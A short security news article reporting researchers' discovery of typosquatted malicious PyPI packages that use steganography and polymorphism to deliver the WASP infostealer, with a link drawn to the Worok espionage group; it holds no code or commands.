>
Checkmarx cybersecurity researchers have discovered more than two dozen malicious packages on PyPI, a popular repository for Python developers, and have released their findings in a new report (opens in new tab).
These malicious packages, designed to look almost identical to legitimate packages, try to trick reckless developers into downloading and installing the wrong ones, thereby spreading malware.
This practice is known as typosquatting and is quite popular among cybercriminals who attack software developers.
Infostealer thefts
To hide the malware, the attackers use two unique approaches: steganography and polymorphism.
Steganography is the practice of hiding code within an image, allowing attackers to distribute malicious code via seemingly innocuous .JPGs and .PNGs.
Polymorphic malware, on the other hand, changes the payload with each install, successfully avoiding antivirus programs and other cybersecurity solutions.
Here, the attackers used these techniques to deliver WASP, an infostealer capable of grabbing people’s Discord accounts, passwords, cryptocurrency wallet information, credit card details, and other information about the victim’s endpoint that it deems interesting .
Once identified, the data is sent back to the attackers via a hard-coded Discord webhook address.
The campaign appears to be a marketing stunt as the researchers apparently saw the threat actors advertise the tool on the dark web for $20 and claim it is undetectable.
In addition, the researchers believe this is the same group that was behind a similar attack first reported earlier this month by researchers from tribe (opens in new tab) and Control point (opens in new tab). At the time, it was said that a group called Worok has been distributing DropBoxControl since at least September 2022, a custom .NET C# infostealer that misuses Dropbox file hosting for communications and data theft.
Given the toolkit, the researchers believe Worok is the work of a cyber-espionage group that operates quietly, likes to move sideways over target networks and steal sensitive data. It also appears to be using its own proprietary tools, as the researchers have not observed them being used by anyone else.
Through: The register (opens in new tab)